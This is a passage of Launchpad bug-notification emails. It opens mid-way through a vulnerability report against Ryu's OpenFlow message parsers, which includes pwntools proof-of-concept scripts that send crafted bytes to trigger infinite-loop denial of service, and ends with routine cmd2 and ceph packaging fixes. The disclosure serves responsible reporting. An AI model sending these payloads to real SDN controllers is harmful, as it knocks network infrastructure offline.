                offset += b.length if hasattr(b, 'length') else b.len
    ....
```

If b.length == 0, the offset no longer changes and the parsing falls into an infinite loop.

poc:

```python
from pwn import *
p = remote("0.0.0.0", 6633)
payload = "\x04\x13\x01\x30\x7f\xf9\xb1\x6d\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x06\x42\x2c\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xc4\x00\x01\x00\x20\x80\x00\x00\x04\x00\x00\x00\x02\x80\x00\x08\x06\xd2\xfc\x3a\xb8\x53\xf8\x80\x00\x06\x06\xce\x8f\xb2\x46\xcb\x5b\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x01\xff\xe5\x00\x00\x00\x00\x00\x00\x00\x68\x00\x00\x00\x00\x00\x03\x06\x05\x23\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x62\x00\x01\x00\x20\x80\x00\x00\x04\x00\x00\x00\x01\x80\x00\x08\x06\xce\x8f\xb2\x46\xcb\x5b\x80\x00\x06\x06\xd2\xfc\x3a\xb8\x53\xf8\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x02\xff\xe5\x00\x00\x00\x00\x00\x00\x00\x50\x00\x00\x00\x00\x00\x05\x38\x81\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x04\x40\x00\x01\x00\x04\x00\x00\x00\x00\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\xff\xff\xff\xfd\xff\xff\x00\x00\x00\x00\x00\x00"
p.send(payload)
p.interactive()
```

[8] OFPFlowMod parser

```python
class OFPFlowMod(MsgBase):
    ....
        while offset < msg_len:
            i = OFPInstruction.parser(buf, offset)
            instructions.append(i)
            offset += i.len
        msg.instructions = instructions
```

If OFPInstruction.len == 0, the offset no longer changes and the parsing falls into an infinite loop.

poc:

```python
from pwn import *
p = remote("0.0.0.0", 6633)
payload = b"\x04\x0e\x00\x50\xd8\xbc\xde\xb7\x67\xf9\x0c\x3f\xfb\xa6\xdb\x87\x6f\x63\x34\xd0\xe1\x26\x43\x78\x5e\x01\x34\x0d\x32\xb4\xb3\xff\x8f\x99\xc0\xe9\x9e\x84\x70\x62\xc7\x4a\xbf\x01\xf3\xf0\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\xff\xff\xff\xfd\xff\xff\x00\x00\x00\x00\x00\x00"
p.send(payload)
p.interactive()
```

[9] OFPPacketQueue parser

```python
class OFPPacketQueue(StringifyMixin):
    ....
    @classmethod
    def parser(cls, buf, offset):
    ....
        while length < len_:
            queue_prop = OFPQueueProp.parser(buf, offset)
            if queue_prop is not None:
                properties.append(queue_prop)
                offset += queue_prop.len
                length += queue_prop.len
        o = cls(queue_id, port, properties)
        o.len = len_
        return o
```

If OFPQueueProp.len == 0, the offset and length no longer change and the parsing falls into an infinite loop.

poc:

```python
from pwn import *
p = remote("0.0.0.0", 6633)
payload = "\x04\x17\x00\x50\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x72\x00\x00\x00\x73\x00\x40\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x02\x00\x10\x00\x00\x00\x00\x03\x84\x00\x00\x00\x00\x00\x00\xff\xff\x00\x10\x00\x00\x00\x00\x00\x00\x03\xe7\x00\x00\x00\x00"
p.send(payload)
p.interactive()
```

Finally, I would like to ask whether these vulnerabilities can be assigned corresponding CVE numbers?
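All three loops above share the same flaw: the per-element length read from the wire is trusted to advance the offset. A minimal illustrative sketch of the defensive pattern (the class and function names here are invented to show the idea; they are not from the Ryu codebase):

```python
# Illustrative only: FakeBody stands in for a parsed stats/instruction/
# queue-property element; parse_bodies shows the zero-length guard.

class FakeBody:
    """Stand-in for a parsed element that reports its own length."""
    def __init__(self, length):
        self.length = length

def parse_bodies(buf_len, element_lengths):
    """Walk a buffer of elements, refusing to loop forever when a
    malformed element reports length 0."""
    bodies = []
    offset = 0
    i = 0
    while offset < buf_len:
        # Stand-in for stats_type_cls.cls_stats_body_cls.parser(buf, offset)
        b = FakeBody(element_lengths[i])
        i += 1
        if b.length <= 0:
            # Without this guard, offset never advances and the loop spins.
            raise ValueError("zero-length element at offset %d" % offset)
        bodies.append(b)
        offset += b.length
    return bodies
```

With this guard, a crafted message carrying a zero-length element aborts parsing with an error instead of pinning the offset forever.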
To manage notifications about this bug go to: https://bugs.launchpad.net/dragonflow/+bug/2067973/+subscriptions From 1945661 at bugs.launchpad.net Thu Aug 1 13:13:45 2024 From: 1945661 at bugs.launchpad.net (Tom Moyer) Date: Thu, 01 Aug 2024 13:13:45 -0000 Subject: [Bug 1945661] Re: openstack commands fail with GTK3 error References: <163301210934.14066.3726112048219539237.malonedeb@gac.canonical.com> Message-ID: <172251802742.1553895.1859319902370062111.launchpad@juju-98d295-prod-launchpad-4> ** Package changed: python-openstackclient (Ubuntu) => cmd2 (Ubuntu) ** Also affects: cmd2 (Ubuntu Focal) Importance: Undecided Status: New ** Changed in: cmd2 (Ubuntu Focal) Assignee: (unassigned) => Tom Moyer (tom-tom) -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to cmd2 in Ubuntu. https://bugs.launchpad.net/bugs/1945661 Title: openstack commands fail with GTK3 error Status in cmd2 package in Ubuntu: Confirmed Status in cmd2 source package in Focal: New Bug description: Openstack release: Wallaby OS: Ubuntu 20.04 server edition After installation of python3-openstackclient from apt, while setting up user, roles and project, I executed following command: openstack domain create --description "An Example Domain" example Error: Traceback (most recent call last): File "/usr/bin/openstack", line 6, in from openstackclient.shell import main File "/usr/lib/python3/dist-packages/openstackclient/shell.py", line 23, in from osc_lib import shell File "/usr/lib/python3/dist-packages/osc_lib/shell.py", line 24, in from cliff import app File "/usr/lib/python3/dist-packages/cliff/app.py", line 22, in import cmd2 File "/usr/lib/python3/dist-packages/cmd2.py", line 585, in _ = pyperclip.paste() File "/usr/lib/python3/dist-packages/pyperclip/__init__.py", line 667, in lazy_load_stub_paste copy, paste = determine_clipboard() File "/usr/lib/python3/dist-packages/pyperclip/__init__.py", line 558, in determine_clipboard return 
init_gi_clipboard() File "/usr/lib/python3/dist-packages/pyperclip/__init__.py", line 167, in init_gi_clipboard gi.require_version('Gtk', '3.0') File "/usr/lib/python3/dist-packages/gi/__init__.py", line 129, in require_version raise ValueError('Namespace %s not available' % namespace) Had to install GTK3 to make openstack commands work but it is taking huge time to get a response to the commands. The wait time after firing any openstack cli command is around 30 seconds. Anybody faced the issue? What is the fix for it if it exists? To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cmd2/+bug/1945661/+subscriptions From 1945661 at bugs.launchpad.net Thu Aug 1 13:22:24 2024 From: 1945661 at bugs.launchpad.net (Tom Moyer) Date: Thu, 01 Aug 2024 13:22:24 -0000 Subject: [Bug 1945661] Re: openstack commands fail with GTK3 error References: <163301210934.14066.3726112048219539237.malonedeb@gac.canonical.com> Message-ID: <172251854462.869317.1038101770702615778.malone@juju-98d295-prod-launchpad-3> ** Description changed: + [ Impact ] + + * There is a bug in cmd2 v0.8.5 where an exception is thrown when GTK3 + libraries are not installed. This causes Python applications using + cmd2 to crash unexpectedly + + * This patch backports a fix from upstream that handles that exception + gracefully, allowing applications to function properly. + + * The workaround to this was to install GTK3, which is not ideal as the + Python applications are command line tools, not graphical + + [ Test Plan ] + + * Deploy focal + + * Install an application that has cmd2 as a dependency + e.g. python3-openstackclient + + * Run command that uses cmd2: `openstack server list` + + [ Where problems could occur ] + + * This changes the error handling for a library that is used by many + Python applications.
Some of these applications could rely on the + existing behavior (a ValueError exception being thrown) to detect + certain configurations and change their behavior accordingly. + + * This would result in those applications failing under certain use + cases. For example, the configuration in question is a headless + Linux system without GTK libraries installed. + + [ Original bug description ] + Openstack release: Wallaby OS: Ubuntu 20.04 server edition - After installation of python3-openstackclient from apt, while setting up user, roles and project, I executed following command: + After installation of python3-openstackclient from apt, while setting up user, roles and project, I executed following command: openstack domain create --description "An Example Domain" example - Error: + Error: Traceback (most recent call last): File "/usr/bin/openstack", line 6, in from openstackclient.shell import main File "/usr/lib/python3/dist-packages/openstackclient/shell.py", line 23, in from osc_lib import shell File "/usr/lib/python3/dist-packages/osc_lib/shell.py", line 24, in from cliff import app File "/usr/lib/python3/dist-packages/cliff/app.py", line 22, in import cmd2 File "/usr/lib/python3/dist-packages/cmd2.py", line 585, in _ = pyperclip.paste() File "/usr/lib/python3/dist-packages/pyperclip/__init__.py", line 667, in lazy_load_stub_paste copy, paste = determine_clipboard() File "/usr/lib/python3/dist-packages/pyperclip/__init__.py", line 558, in determine_clipboard return init_gi_clipboard() File "/usr/lib/python3/dist-packages/pyperclip/__init__.py", line 167, in init_gi_clipboard gi.require_version('Gtk', '3.0') File "/usr/lib/python3/dist-packages/gi/__init__.py", line 129, in require_version raise ValueError('Namespace %s not available' % namespace) Had to install GTK3 to make openstack commands work but it is taking huge time to get a response to the commands. The wait time after firing any openstack cli command is around 30 seconds. Anybody faced the issue? 
What is the fix for it if it exists? ** Patch added: "lp1945661.debdiff" https://bugs.launchpad.net/ubuntu/+source/cmd2/+bug/1945661/+attachment/5801946/+files/lp1945661.debdiff -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to cmd2 in Ubuntu. https://bugs.launchpad.net/bugs/1945661 Title: openstack commands fail with GTK3 error Status in cmd2 package in Ubuntu: Confirmed Status in cmd2 source package in Focal: New
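The backported cmd2 fix is described as handling the failed GTK probe gracefully. A minimal sketch of that pattern (the probe function below is a stand-in, not the actual cmd2/pyperclip code):

```python
# Sketch: a failed GTK clipboard probe should mean "no clipboard",
# not a crash of the whole command-line tool.

def probe_gtk_clipboard():
    # Stand-in for gi.require_version('Gtk', '3.0'), which raises
    # ValueError when the GTK3 namespace is not available.
    raise ValueError("Namespace Gtk not available")

def clipboard_available():
    try:
        probe_gtk_clipboard()
    except (ValueError, ImportError):
        # Headless system without GTK installed: degrade gracefully.
        return False
    return True
```

On a headless server this returns False and the application continues without clipboard support instead of aborting at import time.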
To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cmd2/+bug/1945661/+subscriptions From 2065867 at bugs.launchpad.net Thu Aug 1 14:06:28 2024 From: 2065867 at bugs.launchpad.net (Launchpad Bug Tracker) Date: Thu, 01 Aug 2024 14:06:28 -0000 Subject: [Bug 2065867] Re: mgr: failed dependency - no module named distutils References: <171585157886.2556480.10076801659665033366.malonedeb@juju-98d295-prod-launchpad-2> Message-ID: <172252119796.2776201.16807723255274550884.malone@scripts.lp.internal> This bug was fixed in the package ceph - 19.2.0~git20240301.4c76c50-0ubuntu6.1 --------------- ceph (19.2.0~git20240301.4c76c50-0ubuntu6.1) noble; urgency=medium [ Luciano Lo Giudice] * d/control: Add python3-{packaging,ceph-common} to (Build-)Depends as these are undocumented/detected runtime dependencies in ceph-volume (LP: #2064717). [ James Page ] * d/cephadm.install: Install cephadmlib Python module which the cephadm script uses (LP: #2063456). * d/control: Update Vcs-* to point to Launchpad for Ubuntu packaging. * d/p/mgr-distutils.patch: Directly use vendored distutils from setuptools for Python that runs in the mgr daemon (LP: #2065867). -- James Page Sat, 18 May 2024 12:40:36 +0200 ** Changed in: ceph (Ubuntu Noble) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ceph in Ubuntu. https://bugs.launchpad.net/bugs/2065867 Title: mgr: failed dependency - no module named distutils Status in ceph package in Ubuntu: Fix Released Status in ceph source package in Noble: Fix Released Status in ceph source package in Oracular: Fix Released Bug description: [ Impact ] dashboard and volume ceph mgr modules fail to activate under Python 3.12 due to use of distutils. 
[ Test Plan ] sudo snap install --channel latest/edge/core24 microceph sudo microceph cluster bootstrap sudo microceph status for proposed testing we'll bake a core24-proposed snap to test with. [ Where problems could occur ] The proposed patch switches to using the vendored distutils in setuptools for the two imports in the ceph mgr modules that exhibit this issue - this is a minimal fix; the codebase really needs refactoring to drop all use of distutils, but that is outside the scope of an SRU update. Other distutils usage gets caught by the distutils_hack that setuptools uses to inject its vendored copy into the distutils module location. [ Original Bug Report ] When running microceph on a core24 base, the ceph-mgr has errors on enabling specific modules - volume and dashboard.

$ sudo microceph.ceph status
  cluster:
    id: 4e3ff87c-5320-4494-9d3c-42e69cc11398
    health: HEALTH_WARN
            Module 'volumes' has failed dependency: No module named 'distutils'
            OSD count 0 < osd_pool_default_size 3
  services:
    mon: 1 daemons, quorum joplin.glenview.com (age 5s)
    mgr: joplin.glenview.com(active, starting, since 0.942931s)
    osd: 0 osds: 0 up, 0 in
  data:
    pools: 0 pools, 0 pgs
    objects: 0 objects, 0 B
    usage: 0 B used, 0 B / 0 B avail
    pgs:

distutils as a standalone package was removed from noble - the ceph codebase still makes quite a bit of use of distutils, which gets picked up by the distutils_hack in setuptools but not in the context of the mgr daemon.
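The vendored-distutils approach described above can be sketched as a fallback import; the exact symbols that d/p/mgr-distutils.patch touches may differ, so this is illustrative only:

```python
# Sketch of the fallback pattern: import from the distutils copy
# vendored inside setuptools when the standalone module is absent
# (Python 3.12+, as on noble).

try:
    from distutils.util import strtobool  # works on Python <= 3.11
except ImportError:
    from setuptools._distutils.util import strtobool  # vendored copy
```

Code importing this way keeps working whether or not the standalone distutils package is installed.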
To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ceph/+bug/2065867/+subscriptions From 2065867 at bugs.launchpad.net Thu Aug 1 14:07:02 2024 From: 2065867 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 14:07:02 -0000 Subject: [Bug 2065867] Update Released References: <171585157886.2556480.10076801659665033366.malonedeb@juju-98d295-prod-launchpad-2> Message-ID: <172252122240.774312.10440671795144487236.malone@juju-98d295-prod-launchpad-7> The verification of the Stable Release Update for ceph has completed successfully and the package is now being released to -updates. Subsequently, the Ubuntu Stable Release Updates Team is being unsubscribed and will not receive messages about this bug report. In the event that you encounter a regression using the package from -updates please report a new bug using ubuntu-bug and tag the bug report regression-update so we can easily find any regressions. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ceph in Ubuntu. https://bugs.launchpad.net/bugs/2065867 Title: mgr: failed dependency - no module named distutils Status in ceph package in Ubuntu: Fix Released Status in ceph source package in Noble: Fix Released Status in ceph source package in Oracular: Fix Released To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ceph/+bug/2065867/+subscriptions From 2064717 at bugs.launchpad.net Thu Aug 1 14:06:28 2024 From: 2064717 at bugs.launchpad.net (Launchpad Bug Tracker) Date: Thu, 01 Aug 2024 14:06:28 -0000 Subject: [Bug 2064717] Re: ceph-volume needs "packaging" and "ceph" modules References: <171472547390.1390102.3421238173977349085.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252119599.2776201.16637393260031144375.malone@scripts.lp.internal> This bug was fixed in the package ceph - 19.2.0~git20240301.4c76c50-0ubuntu6.1 --------------- ceph (19.2.0~git20240301.4c76c50-0ubuntu6.1) noble; urgency=medium [ Luciano Lo Giudice] * d/control: Add python3-{packaging,ceph-common} to (Build-)Depends as these are undocumented/detected runtime dependencies in ceph-volume (LP: #2064717). [ James Page ] * d/cephadm.install: Install cephadmlib Python module which the cephadm script uses (LP: #2063456).
* d/control: Update Vcs-* to point to Launchpad for Ubuntu packaging. * d/p/mgr-distutils.patch: Directly use vendored distutils from setuptools for Python that runs in the mgr daemon (LP: #2065867). -- James Page Sat, 18 May 2024 12:40:36 +0200 ** Changed in: ceph (Ubuntu Noble) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ceph in Ubuntu. https://bugs.launchpad.net/bugs/2064717 Title: ceph-volume needs "packaging" and "ceph" modules Status in Ceph OSD Charm: Fix Released Status in Ceph OSD Charm reef series: Invalid Status in ceph package in Ubuntu: Fix Released Status in ceph source package in Noble: Fix Released Status in ceph source package in Oracular: Fix Released Bug description: [ Impact ] ceph-volume tool is not usable directly after install due to missing dependencies. [ Test Plan ] sudo apt install ceph-volume ceph-volume --help [ Where problems could occur ] The missing packaging module is immediately obvious - the ceph dependency less so, as ceph-volume is usually installed with ceph-osd (which already pulls this in). Direct users of ceph-volume will get new depends pulled in.
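The Depends addition described in the changelog could look roughly like this in d/control; the field values below are illustrative, not the actual packaging diff:

```
Package: ceph-volume
Architecture: all
Depends: python3-packaging,
         python3-ceph-common,
         ${misc:Depends},
         ${python3:Depends}
```

Declaring the modules as package dependencies means apt pulls them in even when ceph-volume is installed without ceph-osd.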
[ Original Bug Report ] The ceph-volume program needs python3-packaging but it looks like we're not installing it in jammy-caracal https://github.com/ceph/ceph/pull/54423/commits/0985e201342fa53c014a811156aed661b4b8f994 https://openstack-ci-reports.ubuntu.com/artifacts/dcf/917920/4/check/jammy-caracal/dcf9973/index.html Traceback excerpt: 2024-05-02 19:31:54.624912 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 INFO unit.ceph-osd/0.juju-log server.go:316 mon:27: osdize cmd: ['ceph-volume', 'lvm', 'create', '--osd-fsid', 'aef29aff-df24-4bb8-bfb3-bcd607761b2e', '--bluestore', '--data', 'ceph-aef29aff-df24-4bb8-bfb3-bcd607761b2e/osd-block-aef29aff-df24-4bb8-bfb3-bcd607761b2e'] 2024-05-02 19:31:54.624972 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 Traceback (most recent call last): 2024-05-02 19:31:54.624990 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/sbin/ceph-volume", line 33, in 2024-05-02 19:31:54.625002 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 sys.exit(load_entry_point('ceph-volume==1.0.0', 'console_scripts', 'ceph-volume')()) 2024-05-02 19:31:54.625014 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/sbin/ceph-volume", line 25, in importlib_load_entry_point 2024-05-02 19:31:54.625189 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 return next(matches).load() 2024-05-02 19:31:54.625210 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed 
logger.go:60 File "/usr/lib/python3.10/importlib/metadata/__init__.py", line 171, in load 2024-05-02 19:31:54.625222 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 module = import_module(match.group('module')) 2024-05-02 19:31:54.625234 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3.10/importlib/__init__.py", line 126, in import_module 2024-05-02 19:31:54.625247 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 return _bootstrap._gcd_import(name[level:], package, level) 2024-05-02 19:31:54.625259 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 1050, in _gcd_import 2024-05-02 19:31:54.625541 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 1027, in _find_and_load 2024-05-02 19:31:54.625598 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 1006, in _find_and_load_unlocked 2024-05-02 19:31:54.625611 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 688, in _load_unlocked 2024-05-02 19:31:54.625622 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 883, in exec_module 2024-05-02 19:31:54.625633 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed 
logger.go:60 File "", line 241, in _call_with_frames_removed 2024-05-02 19:31:54.625975 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/main.py", line 9, in 2024-05-02 19:31:54.626007 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from ceph_volume import log, devices, configuration, conf, exceptions, terminal, inventory, drive_group, activate 2024-05-02 19:31:54.626057 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/devices/__init__.py", line 1, in 2024-05-02 19:31:54.626072 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from . import lvm, simple, raw # noqa 2024-05-02 19:31:54.626280 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/devices/lvm/__init__.py", line 1, in 2024-05-02 19:31:54.626313 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from .main import LVM # noqa 2024-05-02 19:31:54.626327 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/devices/lvm/main.py", line 4, in 2024-05-02 19:31:54.626339 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from . 
import activate 2024-05-02 19:31:54.626359 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/devices/lvm/activate.py", line 9, in 2024-05-02 19:31:54.626371 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from ceph_volume.util import encryption as encryption_utils 2024-05-02 19:31:54.626465 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/util/encryption.py", line 9, in 2024-05-02 19:31:54.626490 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from packaging import version 2024-05-02 19:31:54.626502 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 ModuleNotFoundError: No module named 'packaging' To manage notifications about this bug go to: https://bugs.launchpad.net/charm-ceph-osd/+bug/2064717/+subscriptions From 2064717 at bugs.launchpad.net Thu Aug 1 14:06:55 2024 From: 2064717 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 14:06:55 -0000 Subject: [Bug 2064717] Update Released References: <171472547390.1390102.3421238173977349085.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252121570.320285.10168160233848917758.malone@juju-98d295-prod-launchpad-2> The verification of the Stable Release Update for ceph has completed successfully and the package is now being released to -updates. Subsequently, the Ubuntu Stable Release Updates Team is being unsubscribed and will not receive messages about this bug report. 
In the event that you encounter a regression using the package from -updates please report a new bug using ubuntu-bug and tag the bug report regression-update so we can easily find any regressions. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ceph in Ubuntu. https://bugs.launchpad.net/bugs/2064717 Title: ceph-volume needs "packaging" and "ceph" modules Status in Ceph OSD Charm: Fix Released Status in Ceph OSD Charm reef series: Invalid Status in ceph package in Ubuntu: Fix Released Status in ceph source package in Noble: Fix Released Status in ceph source package in Oracular: Fix Released To manage notifications about this bug go to: https://bugs.launchpad.net/charm-ceph-osd/+bug/2064717/+subscriptions From 2063456 at bugs.launchpad.net Thu Aug 1 14:06:28 2024 From: 2063456 at bugs.launchpad.net (Launchpad Bug Tracker) Date: Thu, 01 Aug 2024 14:06:28 -0000 Subject: [Bug 2063456] Re: package cephadm: dependency "cephadmlib" missing References: <171405346965.2999622.7629650603626855594.malonedeb@juju-98d295-prod-launchpad-4> Message-ID: <172252119280.2776201.11436544088405820700.malone@scripts.lp.internal> This bug was fixed in the package ceph - 19.2.0~git20240301.4c76c50-0ubuntu6.1 --------------- ceph (19.2.0~git20240301.4c76c50-0ubuntu6.1) noble; urgency=medium [ Luciano Lo Giudice] * d/control: Add python3-{packaging,ceph-common} to (Build-)Depends as these are undocumented/detected runtime
    dependencies in ceph-volume (LP: #2064717).

  [ James Page ]
  * d/cephadm.install: Install cephadmlib Python module which the cephadm script uses (LP: #2063456).
  * d/control: Update Vcs-* to point to Launchpad for Ubuntu packaging.
  * d/p/mgr-distutils.patch: Directly use vendored distutils from setuptools for Python that runs in the mgr daemon (LP: #2065867).

 -- James Page  Sat, 18 May 2024 12:40:36 +0200

** Changed in: ceph (Ubuntu Noble)
   Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ceph in Ubuntu.
https://bugs.launchpad.net/bugs/2063456

Title: package cephadm: dependency "cephadmlib" missing

Status in ceph package in Ubuntu: Fix Released
Status in ceph source package in Noble: Fix Released
Status in ceph source package in Oracular: Fix Released

Bug description:

[ Impact ]
cephadm tool is not usable due to files missing from the package.

[ Test Plan ]
sudo apt install cephadm
cephadm bootstrap --mon-ip 10.23.127.2

[ Where problems could occur ]
While fixing the minor packaging issue that causes this problem, it was also noticed that the package is architecture "any" rather than "all" (and it's pure Python), so the packaging update includes this as well.

[ Original Bug Report ]
After installing cephadm, at least on arm64, cephadmlib is missing.

Traceback (most recent call last):
  File "/usr/sbin/cephadm", line 33, in <module>
    from cephadmlib.constants import (
ModuleNotFoundError: No module named 'cephadmlib'

Steps to reproduce (on ARM64)
root at ceph-node1:~# apt install -y cephadm
Reading package lists... Done
Building dependency tree... Done
Reading state information...
Done The following additional packages will be installed:   bridge-utils containerd dns-root-data dnsmasq-base docker.io pigz runc ubuntu-fan Suggested packages:   ifupdown aufs-tools cgroupfs-mount | cgroup-lite debootstrap docker-buildx docker-compose-v2   docker-doc rinse zfs-fuse | zfsutils The following NEW packages will be installed:   bridge-utils cephadm containerd dns-root-data dnsmasq-base docker.io pigz runc ubuntu-fan 0 upgraded, 9 newly installed, 0 to remove and 0 not upgraded. root at ceph-node1:~# cephadm bootstrap --mon-ip 10.23.127.2 Traceback (most recent call last):   File "/usr/sbin/cephadm", line 33, in     from cephadmlib.constants import ( ModuleNotFoundError: No module named 'cephadmlib' ProblemType: Bug DistroRelease: Ubuntu 24.04 Package: cephadm 19.2.0~git20240301.4c76c50-0ubuntu6 ProcVersionSignature: Ubuntu 6.8.0-31.31-generic 6.8.1 Uname: Linux 6.8.0-31-generic aarch64 ApportVersion: 2.28.1-0ubuntu2 Architecture: arm64 CasperMD5CheckResult: pass Date: Thu Apr 25 13:49:50 2024 InstallationDate: Installed on 2024-04-25 (0 days ago) InstallationMedia: Ubuntu-Server 24.04 LTS "Noble Numbat" - Release arm64 (20240423) ProcEnviron:  LANG=en_US.UTF-8  LC_CTYPE=C.UTF-8  PATH=(custom, no user)  SHELL=/bin/bash  TERM=xterm-256color SourcePackage: ceph UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: 